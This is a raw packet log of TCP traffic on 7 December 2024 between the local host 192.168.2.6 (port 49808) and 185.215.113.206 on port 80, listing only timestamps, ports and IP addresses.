Dec 7, 2024 10:51:53.091675043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.091707945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.091748953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.092519045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.092575073 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.092587948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.092631102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.093358994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.093404055 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.093473911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.093519926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.094244003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.094300032 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.127494097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.127564907 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.127692938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.127732038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.127913952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.127998114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.128074884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.128170967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.128638983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.128688097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.128763914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.128812075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.129524946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.129570961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.129630089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.129678011 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.130445957 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.130491972 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.130557060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.130597115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.131373882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.131424904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.131483078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.131532907 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.132270098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.132314920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.132358074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.132400990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.133191109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.133241892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.133287907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.133327007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.134053946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.134107113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.134131908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.134171009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.135001898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.135059118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.135087967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.135150909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.135904074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.135952950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.135979891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.136018991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.136856079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.136909008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.136969090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.137001991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.137716055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.137758970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.137797117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.137830019 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.138624907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.138669968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.138766050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.138803959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.139578104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.139590025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.139626980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.139642954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.140413046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.140455008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.140469074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.140510082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.141361952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.141419888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.141452074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.141495943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.142235994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.142293930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.142328024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.142365932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.143151999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.143204927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.143246889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.143291950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.144079924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.144130945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.144174099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.144215107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.144984961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.145034075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.145100117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.145138025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.145875931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.145926952 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.146003962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.146048069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.146759987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.146820068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.146891117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.146945000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.147762060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.147814989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.147845984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.147888899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.148585081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.148637056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.148837090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.148881912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.149508953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.149554968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.149698019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.149741888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.150415897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.150465012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.150466919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.150502920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.151431084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.151480913 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.151518106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.151560068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.152309895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.152323008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.152364016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.153126955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.153177977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.153251886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.153295040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.154036045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.154076099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.154165030 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.154202938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.154947042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.154992104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.155034065 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.155067921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.155873060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.155921936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.156002045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.156044960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.156759977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.156807899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.156852961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.156893015 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.157655954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.157701969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.157743931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.157784939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.158576012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.158613920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.158735991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.158780098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.159481049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.159527063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.159558058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.159594059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.272063017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.272097111 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.272149086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.272197008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.272464037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.272507906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.272567987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.272604942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.273139000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.273185968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.273248911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.273283005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.274049997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.274089098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.274163008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.274199009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.274995089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.275032997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.275106907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.275141001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.276067972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.276110888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.276206017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.276242018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.276778936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.276834011 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.276865959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.276901007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.277726889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.277771950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.277827978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.277863026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.278603077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.278650045 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.278702021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.278734922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.279506922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.279548883 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.279593945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.279627085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.280508995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.280545950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.280596018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.280633926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.281374931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.281425953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.281477928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.281513929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.282239914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.282279015 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.282335997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.282375097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.283145905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.283181906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.283282042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.283333063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.284043074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.284085035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.284143925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.284181118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.284957886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.285006046 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.285080910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.285121918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.285859108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.285900116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.285929918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.285960913 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.319812059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.319865942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.319880009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.319919109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.320260048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.320302010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.320456028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.320499897 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.321171045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.321222067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.321295977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.321331978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.322052002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.322098017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.322159052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.322196960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.322966099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.323024988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.323080063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.323117018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.323879004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.323926926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.323978901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.324035883 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.324780941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.324827909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.324914932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.324961901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.325716019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.325758934 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.325788975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.325829029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.326641083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.326684952 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.326797962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.326838017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.327563047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.327615976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.327687025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.327740908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.328414917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.328469038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.328505993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.328545094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.329358101 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.329407930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.329454899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.329497099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.330257893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.330305099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.330432892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.330477953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.331264019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.331326008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.331341028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.331387043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.332098961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.332158089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.332247019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.332285881 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.332973957 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.333023071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.333072901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.333116055 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.333841085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.333887100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.333955050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.333995104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.334764004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.334810972 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.334913969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.334954977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.335701942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.335747004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.335820913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.335865021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.336549997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.336599112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.336709976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.336755037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.337472916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.337522030 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.337570906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.337613106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.338409901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.338470936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.338500977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.338543892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.339381933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.339431047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.339483023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.339525938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.340221882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.340270996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.340328932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.340368032 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.341098070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.341141939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.341193914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.341232061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.342024088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.342076063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.342118979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.342163086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.342948914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.343023062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.343048096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.343092918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.343823910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.343875885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.343920946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.343960047 CET	49808	80	192.168.2.6	185.215.113.206
